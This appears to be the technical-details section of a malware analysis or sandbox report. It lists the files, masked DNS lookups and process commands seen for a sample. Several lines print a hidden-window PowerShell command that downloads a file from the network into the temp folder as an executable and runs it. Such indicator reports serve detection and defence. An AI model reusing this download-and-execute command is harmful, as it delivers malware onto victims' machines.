Technical Information
- $pqmvphfvzs as %temp%\lcjapcidwrva.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Kzxyurba([String] $pqmvphfvzs){(New-Object System.Net.WebClient).DownloadFile($pqmvphfvzs,''%TEMP%\Lcjapcidwrva.exe'');Start-Process ''%TEMP%\Lcjapcidwrva....
- %TEMP%\iqvsax.bat
- DNS ASK po###italy.com
- DNS ASK ev#####psikolojisi.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Kzxyurba([String] $pqmvphfvzs){(New-Object System.Net.WebClient).DownloadFile($pqmvphfvzs,''%TEMP%\Lcjapcidwrva.exe'');Start-Process ''%TEMP%\Lcjapcidwrva....' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\iqvsax.bat" "' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\iqvsax.bat" "